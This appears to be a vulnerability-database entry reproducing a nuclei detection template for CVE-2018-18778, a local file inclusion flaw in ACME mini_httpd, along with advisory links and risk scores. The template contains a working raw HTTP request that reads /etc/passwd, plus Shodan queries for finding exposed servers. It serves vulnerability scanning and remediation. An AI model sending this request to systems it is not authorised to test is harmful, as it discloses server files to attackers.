Lucene search
K

ACME mini_httpd <1.30 - Local File Inclusion

🗓️ 27 Jun 2026 03:01:36Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 276 Views

ACME mini_httpd <1.30 - Local File Inclusion vulnerability allows reading arbitrary files on the server

Related
Refs
Code
ReporterTitlePublishedViews
Family
AlpineLinux
CVE-2018-18778
29 Oct 201802:00
alpinelinux
CNVD
ACME mini_httpd Arbitrary File Read Vulnerability
29 Oct 201800:00
cnvd
CVE
CVE-2018-18778
29 Oct 201802:00
cve
Cvelist
CVE-2018-18778
29 Oct 201802:00
cvelist
Debian CVE
CVE-2018-18778
29 Oct 201802:00
debiancve
NVD
CVE-2018-18778
29 Oct 201812:29
nvd
OpenVAS
Generic HTTP Directory Traversal / File Inclusion (Web Root) - Active Check
18 Apr 201700:00
openvas
OpenVAS
Ubuntu: Security Advisory (USN-4848-1)
27 Jan 202300:00
openvas
OSV
ALPINE-CVE-2018-18778
29 Oct 201812:29
osv
OSV
DEBIAN-CVE-2018-18778
29 Oct 201812:29
osv
Rows per page
id: CVE-2018-18778

info:
  name: ACME mini_httpd <1.30 - Local File Inclusion
  author: DhiyaneshDK,dogasantos
  severity: medium
  description: ACME mini_httpd before 1.30 is vulnerable to local file inclusion.
  impact: |
    Successful exploitation of this vulnerability allows an attacker to read arbitrary files on the server.
  remediation: |
    Upgrade ACME mini_httpd to version 1.30 or later to mitigate this vulnerability.
  reference:
    - https://www.acunetix.com/vulnerabilities/web/acme-mini_httpd-arbitrary-file-read/
    - http://www.acme.com/software/mini_httpd/
    - https://nvd.nist.gov/vuln/detail/CVE-2018-18778
    - https://github.com/0xT11/CVE-POC
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 6.5
    cve-id: CVE-2018-18778
    cwe-id: CWE-200
    epss-score: 0.74036
    epss-percentile: 0.99419
    cpe: cpe:2.3:a:acme:mini-httpd:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: acme
    product: mini-httpd
    shodan-query:
      - 'Server: mini_httpd && 200'
      - cpe:"cpe:2.3:a:acme:mini-httpd"
      - "server: mini_httpd && 200"
  tags: cve,cve2018,lfi,mini_httpd,acme,vuln

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers:
      - type: word
        part: header
        words:
          - "Server: mini_httpd"
        internal: true

  - raw:
      - |+
        GET /etc/passwd HTTP/1.1
        Host:

    unsafe: true

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100d50a486f78e4865f45ca10c909a32c07884cd0e3d2d5a3732f88883081dceead022100b0cd10db9b9c096f83ed40a5866a513323d9e53bd4381d9be22cc4ee18e76247:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.7Medium risk
Vulners AI Score6.7
CVSS 24
CVSS 36.5
EPSS0.74036
276